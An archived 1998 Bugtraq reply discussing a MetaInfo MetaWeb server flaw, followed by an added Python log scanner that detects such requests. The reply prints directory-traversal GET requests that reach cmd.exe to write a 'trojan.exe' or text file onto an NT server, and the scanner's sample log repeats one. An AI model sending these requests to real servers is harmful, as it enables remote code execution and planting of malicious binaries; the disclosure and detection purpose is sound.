[7127] in bugtraq
Re: Security vulnerabilities in MetaInfo products
daemon@ATHENA.MIT.EDU (pedward@WEBCOM.COM)
Wed Jul 1 12:08:33 1998
Date: Tue, 30 Jun 1998 13:18:02 -0700
Reply-To: pedward@WEBCOM.COM
From: pedward@WEBCOM.COM
X-To: jeff@WIRETRIP.NET
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.95.980630125958.8247A-100000@7of9.neologic.net> from
"Jeff Forristal" at Jun 30, 98 01:01:55 pm
> The MetaWeb server allows the running of NT batch/CMD files (this is how
> some of the Sendmail remote configuring works); if an attacker was to upload
> or produce a standard NT batch file, he could run any program he wishes.
>
>
> -Jeff Forristal
Ya know, the days of old where we had to use the COPY command to edit
the autoexec.bat come to mind:

An application that uses the following command could potentially upload a
binary to an NT server and run it:

    GET ../../winnt/system32/cmd.exe?/c+copy+/b+con+c:\temp\trojan.exe HTTP/1.0

Or if you want to create a text file:

    GET ../../winnt/system32/cmd.exe?/c+copy+con+c:\temp\trojan.txt HTTP/1.0

and terminate with a ^Z

Theoretically the commands above should work for the sendmail case that
Jeff explained.
--Perry
--
Perry Harrington System Software Engineer zelur xuniL ()
http://www.webcom.com perry.harrington@webcom.com Think Blue. /\
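
Added example, not part of the original message or of any MetaInfo code: a log check that flags request targets of the shape quoted above, meaning paths that climb above the web root or resolve to the NT shell or a batch/CMD file. The access-log layout, the reason labels and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Targets the thread describes the server executing: the NT shell and batch/CMD files.
SHELL_TARGETS = re.compile(r"(?:^|/)(?:cmd\.exe|command\.com|[^/]+\.(?:bat|cmd))$", re.I)
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/\d\.\d"')

def decode_fully(value, max_rounds=3):
    """Percent-decode until stable so encoded dots and separators are normalised."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(target):
    """Return the set of reasons a request target is suspicious (empty set = clean)."""
    path, _, query = target.partition("?")
    path = decode_fully(path).replace("\\", "/")
    reasons = set()
    depth = 0  # directory depth relative to the web root
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        depth += -1 if seg == ".." else 1
        if depth < 0:  # climbed above the web root
            reasons.add("escapes-web-root")
            break
    if SHELL_TARGETS.search(path):
        reasons.add("shell-or-batch-target")
        if query:
            reasons.add("arguments-passed-to-shell")
    return reasons

def scan(log_lines):
    """Return [(line_number, reasons)] for every flagged access-log line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match and (reasons := classify(match.group("target"))):
            hits.append((number, reasons))
    return hits

# Constructed sample log (addresses from the 192.0.2.0/24 documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jun/1998:13:18:02 -0700] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.10 - - [30/Jun/1998:13:18:05 -0700] "GET /docs/../index.html HTTP/1.0" 200 1043',
    r'192.0.2.77 - - [30/Jun/1998:13:19:40 -0700] "GET ../../winnt/system32/cmd.exe?/c+copy+con+c:\temp\trojan.txt HTTP/1.0" 200 0',
]
```

scan(SAMPLE_LOG) flags only the third line; the second line contains ".." but never leaves the web root, so it is not reported.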